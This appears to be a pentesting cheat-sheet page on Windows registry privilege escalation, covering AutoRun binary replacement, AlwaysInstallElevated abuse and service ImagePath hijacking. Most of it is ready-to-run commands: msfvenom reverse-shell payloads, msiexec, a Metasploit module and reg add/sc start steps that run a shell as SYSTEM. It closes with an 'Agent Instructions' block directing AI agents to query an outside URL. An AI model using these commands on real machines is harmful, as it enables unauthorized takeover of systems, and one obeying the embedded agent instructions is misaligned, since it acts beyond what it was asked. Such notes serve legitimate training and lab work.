# Registry ## AUTORUN: You will get a list of AutoRun programs from your enumeration scripts. It is shown under AutoRun applications in winPEAS. Check if those programs have RW access. Create a malicious executable of the AutoRun program and replace the original one. This however requires a restart of the machine for the AutoRun to give you a shell. This means that, you will only get a shell when the Administrator logs into his account. The administrator receives a prompt to run a program. Once he accepts the prompt, you will get a reverse shell. ## ALWAYS INSTALL ELEVATED: There are packages in Windows called msi packages. Msi packages are basically Windows installers. For the exploit to work, you need to have 2 registry settings enabled. **reg query HKLM\Software\Policies\Microsoft\Windows\Installer** **reg query HKCU\Software\Policies\Microsoft\Windows\Installer** Check for both if AlwaysInstallElevated is set to 1. #### METHOD 1: Run PowerUp.ps1 and use the Abuse function to add a user or perform some other task #### METHOD 2: Create a metasploit reverse shell. Transfer it to the machine. Run it. ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi #Transfer it to victim machine and run: msiexec /quiet /qn /i C:\Temp\setup.msi ``` #### METHOD 3: ``` #Get a meterpreter shell #Background the session: background #Use exploit use exploit/windows/local/always_install_elevated #Then set the SESSION that was in background ``` ## REGSVC: winPEAS: **Looking if you can modify any service registry** ``` #Suppose that the registry is: HKLM\system\currentcontrolset\services\regsvc (Interactive [TakeOwnership]) #Verify the permissions of the service: #CMD accesschk /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc #POWERSHELL Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List #Check if we can start the service accesschk /accepteula -ucqv user regsvc #Query the service info reg query HKLM:\System\CurrentControlSet\Services\regsvc #Create a reverse shell and transfer it to C:\Temp msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f exe -o shell.exe #Run the following command reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f #Start a listener and the service sc start regsvc ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://coffeetohack.gitbook.io/coffeetohack/windows/registry.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.